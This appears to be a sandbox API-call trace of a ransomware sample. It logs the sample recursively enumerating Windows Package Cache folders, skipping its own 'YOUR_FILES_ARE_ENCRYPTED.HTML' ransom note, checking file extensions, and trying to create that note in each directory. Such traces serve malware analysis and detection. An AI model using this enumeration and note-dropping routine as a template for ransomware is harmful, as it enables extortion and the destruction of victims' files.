ftCreationTime.dwLowDateTime=0xcc668400, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.145] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.145] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.145] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc668400, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.145] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.145] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.145] GetProcessHeap () returned 0x270000 [0170.146] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.146] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc68e560, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.146] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0170.146] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.146] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc68e560, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.147] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.147] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0170.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.147] GetProcessHeap () returned 0x270000 [0170.148] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.148] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc726ae0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0170.148] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 86 [0170.148] GetProcessHeap () returned 0x270000 [0170.148] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.148] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0170.148] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*" [0170.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc726ae0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.148] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc726ae0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.148] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.148] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 95 [0170.148] GetProcessHeap () returned 0x270000 [0170.148] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.148] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0170.148] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*" [0170.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.149] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.149] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc6b46c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.149] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 116 [0170.149] GetProcessHeap () returned 0x270000 [0170.149] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.149] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0170.149] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*" [0170.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc6b46c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.149] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc6b46c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.149] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B", cAlternateFileName="CAB1CA~1.663")) returned 1 [0170.149] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B") returned 190 [0170.150] lstrcmpW (lpString1="cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.150] PathFindExtensionW (pszPath="cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B") returned=".66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B" [0170.150] lstrlenW (lpString=".66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B") returned 65 [0170.150] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.150] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 142 [0170.150] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.150] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.150] lstrlenW (lpString=".msi") returned 4 [0170.150] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.150] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc6b46c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.150] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0170.150] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.150] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc6b46c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc6b46c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc700980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.150] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.150] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0170.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.150] GetProcessHeap () returned 0x270000 [0170.151] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.151] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc700980, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.151] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.151] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.151] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc700980, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc700980, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.151] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.152] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.152] GetProcessHeap () returned 0x270000 [0170.152] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.152] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc726ae0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc726ae0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.153] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.153] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.153] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc726ae0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc726ae0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc726ae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.153] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.153] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.153] GetProcessHeap () returned 0x270000 [0170.154] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.154] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", cAlternateFileName="{2BC3B~1.285")) returned 1 [0170.154] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned 87 [0170.154] GetProcessHeap () returned 0x270000 [0170.154] 